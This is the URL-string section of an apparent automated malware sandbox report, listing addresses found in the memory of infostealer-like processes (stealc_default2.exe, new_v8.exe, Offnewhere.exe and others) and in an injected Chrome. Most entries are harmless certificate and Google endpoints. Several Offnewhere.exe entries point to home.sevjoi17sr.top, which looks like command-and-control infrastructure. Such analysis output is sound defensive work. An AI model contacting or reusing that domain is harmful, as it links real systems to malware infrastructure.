                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365909037.00002B3C00A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                          Source: splwow64.exe, 00000013.00000002.2110940051.000000000041F000.00000004.00000001.01000000.0000000B.sdmp, splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: svchost.exe, 00000023.00000002.3755487168.0000029987EBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: chrome.exe, 0000002B.00000002.2762405730.00002B3C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2704085809.00002B3C0009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
                          Source: svchost.exe, 00000023.00000003.2158177683.000002998D600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs12
                          Source: Offnewhere.exe, 00000012.00000003.2099597102.0000000000D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs1730304302
                          Source: Offnewhere.exe, 00000012.00000003.2099597102.0000000000D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs173030430235a1
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
                          Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                          Source: splwow64.exe, 00000013.00000002.2110907604.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, splwow64.exe, 00000013.00000000.2038248934.0000000000408000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                          Source: splwow64.exe, 00000013.00000002.2110940051.000000000041F000.00000004.00000001.01000000.0000000B.sdmp, splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                          Source: chrome.exe, 0000002B.00000002.2761492694.00002B3C00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135901294.0000000000349000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000029.00000002.3749890554.00000000006A9000.00000002.00000001.01000000.00000017.sdmp, EcoCraft.scr, 0000002F.00000002.2543717342.00000000006A9000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                          Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                          Source: stealc_default2.exe, stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: stealc_default2.exe, 00000011.00000002.2208381556.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                          Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                          Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                          Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                          Source: chrome.exe, 0000002B.00000002.2760023286.00002B3C0041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2767632288.00002B3C009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2769775665.00002B3C00AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                          Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                          Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
